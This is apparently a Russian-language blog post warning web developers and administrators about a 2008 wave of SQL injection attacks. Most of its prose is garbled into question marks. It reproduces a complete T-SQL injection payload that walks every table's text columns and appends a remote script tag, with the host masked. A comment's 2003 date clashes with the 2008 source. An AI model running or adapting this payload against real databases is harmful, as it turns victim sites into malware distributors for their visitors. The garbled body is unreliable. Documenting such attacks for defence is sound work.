Субботнее чтение для дизайнеров и администраторов Web приложений: SQL injection атаки

??? ????? ??????? ?????????? ?? ???????????? ????????? ????? SQL injection ??????, ? ????? ???????????? ?? ?????????????? ???????: https://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx

??? ?? ??????????. ??????: ? ????? ???????? ???? ?????? ???? ??? ????????? ????? SQL injection ???? ?? Web ??????????. ??? ????? ?? ????????? ?????-???? ??????????? ? SQL Server ??? IIS; ????? ?????????? ?????????? ????? Web ??????????. ???????? ????? ????: ?????????? Web ?????????? ?????? ????????????? ??????????? ????? ?? SQL Server-? ? ?????????? ???????? ?????????? ????:

DECLARE @T varchar(255),@C varchar(255)

DECLARE Table_Cursor CURSOR FOR

select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='U' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0) BEGIN

exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=https://www.************.js></script>''')

FETCH NEXT FROM Table_Cursor INTO @T,@C

END

CLOSE Table_Cursor

DEALLOCATE Table_Cursor

????? ?????? ????????? ?????? ?? ???? ?????????? ???????? ? ???????????????? ???????? ?? SQL Server-?, ???????? ? ??? ?????? ?? ????????? ??????, ??????? ?????? ? ????? ???????????? ????????????? ?????? ?????????? ?????? ? ???????.

???????? ?????: Web ?????????? ?????? ???????????? ??????????? ??????????? ?????????? ?? SQL Server-? ????? ?????????????. ?? ?????? ??? ????????? ???????? ???????? ? ????? ?????? ???????????? ??? ????????? ?? ??????????? ?? ?? ????? ?????.

???? ??????? ???????? J

Comments

• Anonymous
  January 01, 2003
  Посвящается моим студентам, жалующимся на высокую требовательность к качеству кода при сдаче лабораторных